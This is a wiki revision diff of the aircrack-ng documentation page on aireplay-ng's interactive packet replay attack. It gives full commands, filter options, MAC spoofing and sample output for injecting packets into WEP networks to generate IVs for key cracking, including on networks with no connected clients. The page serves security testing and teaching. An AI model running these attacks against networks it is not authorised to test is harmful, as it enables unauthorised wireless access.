User Tools

Site Tools


interactive_packet_replay

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
interactive_packet_replay [2007/03/03 21:00]
darkaudax reworte page to standard format and updated content
interactive_packet_replay [2010/11/21 09:05] (current)
sleek typos
Line 1: Line 1:
 ====== Interactive packet replay ====== ====== Interactive packet replay ======
- 
 ===== Description ===== ===== Description =====
  
-This attack allows you to choose a specific packet for replaying (injecting). ​ The attack can obtain packets to replay from two sources. ​ The first being a live flow of packets from your wireless card.  The second being from a pcap file.  Standard Pcap format (Packet CAPture, associated with the libpcap library http://​www.tcpdump.org),​ is recognized by most commercial and open-source traffic capture and analysis tools. ​ Reading from a file is an often overlooked feature of aireplay-ng. ​ This allows you read packets from other capture sessions or quite often, various attacks generate pcap files for easy reuse. ​ A common use of reading ​ a file containing a packet your created with [[packetforge]].+This attack allows you to choose a specific packet for replaying (injecting). ​ The attack can obtain packets to replay from two sources. ​ The first being a live flow of packets from your wireless card.  The second being from a pcap file.  Standard Pcap format (Packet CAPture, associated with the libpcap library http://​www.tcpdump.org),​ is recognized by most commercial and open-source traffic capture and analysis tools. ​ Reading from a file is an often overlooked feature of aireplay-ng. ​ This allows you read packets from other capture sessions or quite often, various attacks generate pcap files for easy reuse. ​ A common use of reading ​ a file containing a packet your created with [[packetforge-ng]]. 
 + 
 +In order to use the interactive packet replay successfully,​ it it important to understand a bit more about the wireless packet flow.  You cannot simply capture and replay any packet. ​ Only certain packets can be replayed successfully. ​ Successfully means that it is accepted by the access point and causes a new initialization vector (IV) to be generated since that is the whole objective. 
 + 
 +To do this, we either have to select a packet which naturally will be successful or manipulate a captured packet into a natural one.  We will now explore these two concepts in more detail. 
 + 
 +First, lets look at what characteristics a packet must have to naturally work.  Access points will always repeat packets destined for the broadcast MAC address. ​ This is a MAC address of FF:​FF:​FF:​FF:​FF:​FF. ​ ARP request packets have this characteristic. ​ As well, the packet must be going from a wireless client to the wired network. ​ This is a packet with the "To DS" (To Distribution System) bit flag set to 1. 
 + 
 +So the aireplay-ng filter options we require to select these packets are: 
 + 
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in 
 +  * -d FF:​FF:​FF:​FF:​FF:​FF selects packets with a broadcast destination 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on 
 + 
 +See "​Natural Packet Replay"​ below for an example. 
 + 
 +Next, we will look at packets which need to be manipulated in order to be successfully replayed by the access point. ​ The objective, as always, is to have the access point rebroadcast the packet you inject and generate a new IV.  As simple as it sounds, the only selection criteria you need is the "-t 1" to select packets going to the distribution system (ethernet):​ 
 + 
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on 
 + 
 +We don't care what the destination MAC address is.  This because in this case we will modify the packet being injected. ​ The following options will result in the packet looking like a "​natural"​ packet above. ​ Here are the options required: 
 + 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client to the access point. ​ IE Set the "To DS" field to 1. 
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV. 
 + 
 +See "​Modified Packet Replay"​ below for an example. 
  
 ===== Usage ===== ===== Usage =====
Line 12: Line 38:
  
   * -2 means interactive replay attack   * -2 means interactive replay attack
-  * <filter options> ​is described [[aireplay-ng#​usage|here]] +  * <filter options> ​are described [[aireplay-ng#​usage|here]] 
-  * <replay options> ​is described [[aireplay-ng#​usage|here]]+  * <replay options> ​are described [[aireplay-ng#​usage|here]]
   * -r <file name> used to specify a pcap file to read packets from (this is optional)   * -r <file name> used to specify a pcap file to read packets from (this is optional)
   * <replay interface>​ is the wireless interface such ath0   * <replay interface>​ is the wireless interface such ath0
  
 ===== Usage Examples ===== ===== Usage Examples =====
 +
 +==== Natural Packet Replay ====
 +
 +For this example, you do not need do a fake authentication first, since the source MAC address is already associated with the access point. ​ The source MAC address is from the existing wireless client.
 +
 +Putting it all together:
 +
 +   ​aireplay-ng -2 -b 00:​14:​6C:​7E:​40:​80 -d FF:​FF:​FF:​FF:​FF:​FF -t 1 ath0
 +
 +Where:
 +
 +  * -2 means interactive replay
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in
 +  * -d FF:​FF:​FF:​FF:​FF:​FF selects packets with a broadcast destination
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on
 +  * ath0 is the wireless interface
 +
 +When launched, the program will look as follows:
 +
 +   Read 4 packets...
 +   
 +        Size: 68, FromDS: 0, ToDS: 1 (WEP)
 +   
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80
 +         Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF
 +        Source MAC  =  00:​0F:​B5:​34:​30:​30
 +   
 +        0x0000: ​ 0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400
 +        0x0010: ​ ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..
 +        0x0020: ​ b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab
 +        0x0030: ​ 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../​t....#​...^EuM
 +        0x0040: ​ 23e0 883e                                #..>
 +
 +   Use this packet ? y
 +
 +Notice that the packet matches our selection criteria. ​ Enter "​y"​ and it starts injecting:
 +
 +   ​Saving chosen packet in replay_src-0315-191310.cap
 +   You should also start airodump-ng to capture replies.
 +   
 +   Sent 773 packets...
 +
 +
 +==== Modified Packet Replay ====
 +
 +For this example, you do not need do a fake authenticaion first, since the source MAC address is already associated with the access point. ​ The source MAC address is from the existing wireless client.
 +
 +Putting it all together:
 +
 +   ​aireplay-ng -2 -b 00:​14:​6C:​7E:​40:​80 -t 1 -c FF:​FF:​FF:​FF:​FF:​FF -p 0841 ath0
 +
 +Where:
 +
 +  * -2 means interactive replay
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in.
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV.
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. ​ IE Set the "To DS" field to 1.
 +  * ath0 is the wireless interface
 +
 +The IVs generated per second will vary based on the size of the packet you select. ​ The smaller the packet size, the higher the rate per second. ​ When launched, the program will look as follows:
 +
 +   Read 10 packets...
 +   
 +        Size: 124, FromDS: 0, ToDS: 1 (WEP)
 +   
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80
 +         Dest. MAC  =  00:​40:​F4:​77:​E5:​C9
 +        Source MAC  =  00:​0F:​B5:​34:​30:​30
 +   
 +        0x0000: ​ 0841 2c00 0014 6c7e 4080 000f b534 3030  .A,​...l~@....400
 +        0x0010: ​ 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.
 +        0x0020: ​ 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;​.
 +        0x0030: ​ 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.
 +        0x0040: ​ 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;​.Cj..v,​..
 +        0x0050: ​ 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?​=.<​.....emf..
 +        0x0060: ​ 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%
 +        0x0070: ​ bf22 960a 5c7b 3036 290a 89d6            ."​..\{06)...
 +   
 +   Use this packet ? y
 +
 +Enter "​y"​ and the program will continue:
 +
 +   ​Saving chosen packet in replay_src-0316-162802.cap
 +   You should also start airodump-ng to capture replies.
 +   
 +   Sent 2966 packets...
 +
 +
 +==== Other Examples ====
  
 You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs): You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs):
Line 26: Line 142:
  
   * -2 means the interactive replay attack   * -2 means the interactive replay attack
-  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.+  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.  IE Set the "To DS" field to 1.
   * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV.   * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV.
   * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP.   * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP.
   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
   *  ath0 is the wireless interface name.   *  ath0 is the wireless interface name.
 +
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
  
 The IVs generated per second will vary based on the size of the packet you select. ​ The smaller the packet size, the higher the rate per second. ​ When launched, the program will look as follows: The IVs generated per second will vary based on the size of the packet you select. ​ The smaller the packet size, the higher the rate per second. ​ When launched, the program will look as follows:
Line 68: Line 186:
  
   * -2 means the interactive replay attack   * -2 means the interactive replay attack
-  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.+  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.  IE Set the "To DS" field to 1.
   * -m 68 is the minimum packet length   * -m 68 is the minimum packet length
   *  -n 86 is the maximum packet length ​   *  -n 86 is the maximum packet length ​
Line 75: Line 193:
   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
   *  ath0 is the wireless interface name.   *  ath0 is the wireless interface name.
 +
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
  
 Once you start the program it looks as follows: Once you start the program it looks as follows:
Line 109: Line 229:
  
   * -2 means the interactive replay attack   * -2 means the interactive replay attack
-  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.+  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.  IE Set the "To DS" field to 1.
   * -c FF:​FF:​FF:​FF:​FF:​FF NOTE: This is not included because an ARP packet already has the destination MAC address set to broadcast.   * -c FF:​FF:​FF:​FF:​FF:​FF NOTE: This is not included because an ARP packet already has the destination MAC address set to broadcast.
   * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP.   * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP.
   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.   * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
   *  ath0 is the wireless interface name.   *  ath0 is the wireless interface name.
 +
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
  
 The program responds: The program responds:
Line 140: Line 262:
  
 ===== Usage Tips ===== ===== Usage Tips =====
 +
 +
 +
 +
 +==== Additional Interactive Application ====
  
 There are some interesting applications of the first example above. ​   It can be used to attack networks without any connected wireless clients. ​ Start the aireplay-ng attack per the example. ​ Now sit back and wait for any packet to be broadcast. ​ It does not matter what type.  Just say "​y"​ and bingo you are generating IVs.  The tradeoff is speed, big packets yield lower IVs per second. ​ The major advantages is it saves the steps of obtaining the xor stream (chopchop or fragmentation attacks), building a packet and launching relay attack. There are some interesting applications of the first example above. ​   It can be used to attack networks without any connected wireless clients. ​ Start the aireplay-ng attack per the example. ​ Now sit back and wait for any packet to be broadcast. ​ It does not matter what type.  Just say "​y"​ and bingo you are generating IVs.  The tradeoff is speed, big packets yield lower IVs per second. ​ The major advantages is it saves the steps of obtaining the xor stream (chopchop or fragmentation attacks), building a packet and launching relay attack.
  
 This would also work on APs with clients. ​ It would be faster since you don't have to wait for an ARP, any packet will do. This would also work on APs with clients. ​ It would be faster since you don't have to wait for an ARP, any packet will do.
 +
 +IMPORTANT: ​ The source MAC address you use must first be associated with the AP via fake authentication.
 +
 +==== Injecting Management Frames ====
 +
 +You can also inject management and control frames on a per frame basis with aireplay-ng. ​ You just need to specify a matching filter since the default one just allows wep data packets. ​
 +
 +Examples:
 +  * Setting -v 8 -u 0 -w 0 allows you to send beacons frames.
 +  * Setting -v 12 -u 1 -w 0 -m 10 -n 2000 sets a filter for control frames (in this case clear-to-send frames).
 +
  
 ===== Usage Troubleshooting ===== ===== Usage Troubleshooting =====
Line 150: Line 288:
  
 Check the [[i_am_injecting_but_the_ivs_don_t_increase|I am injecting but the ivs don't increase tutorial]]. Check the [[i_am_injecting_but_the_ivs_don_t_increase|I am injecting but the ivs don't increase tutorial]].
 +
 +One situation that may affect interactive replay: Exception of wireless client separation option - http://​forum.aircrack-ng.org/​index.php?​topic=194
  
 Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]]. Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]].
  
interactive_packet_replay.1172952005.txt.gz · Last modified: 2007/03/03 21:00 (external edit)